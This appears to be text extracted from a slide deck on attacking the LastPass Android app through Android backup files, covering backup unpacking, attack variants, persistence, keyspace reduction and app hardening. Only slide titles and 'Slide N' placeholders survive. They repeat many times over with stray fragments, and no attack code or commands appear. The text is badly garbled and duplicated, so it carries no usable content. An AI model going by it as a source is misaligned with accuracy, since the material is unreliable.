Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7
